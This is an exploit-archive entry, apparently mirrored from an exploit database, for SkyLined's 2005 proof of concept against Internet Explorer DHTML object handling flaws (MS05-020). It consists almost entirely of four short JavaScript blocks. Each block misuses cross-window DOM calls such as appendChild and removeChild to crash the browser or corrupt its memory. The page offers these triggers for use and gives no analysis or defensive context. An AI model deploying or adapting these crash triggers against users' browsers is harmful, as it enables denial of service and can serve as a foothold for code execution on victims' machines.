[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MS Internet Explorer DHTML Object Handling Vulns (MS05-020)
# Published : 2005-04-12
# Author : SkyLined
# Previous Title : Yager <= 5.24 Multiple Denial of Service Exploit
# Next Title : MailEnable Enterprise 1.x SMTP Remote Denial of Service Exploit
<!-- Here are multiple Microsoft Internet Explorer DHTML Object Handling Vulnerabilities by Skylined /str0ke -->
<SCRIPT language="javascript">
a=document.createTextNode();try{window.open().document.appendChild(a);}catch(e){}document.removeChild(a);
</SCRIPT>
<SCRIPT language="javascript">
p=document.createElement();c=window.open().document.createElement();try{c.appendChild(p);}catch(e){p.removeChild(c);};
</SCRIPT>
<SCRIPT language="javascript">
try{window.open().document.appendChild(document);}catch(e){}
</SCRIPT>
<SCRIPT>
try{window.open().document.appendChild(document.all[0]);}catch(e){}
</SCRIPT>
# www.Syue.com [2005-04-12]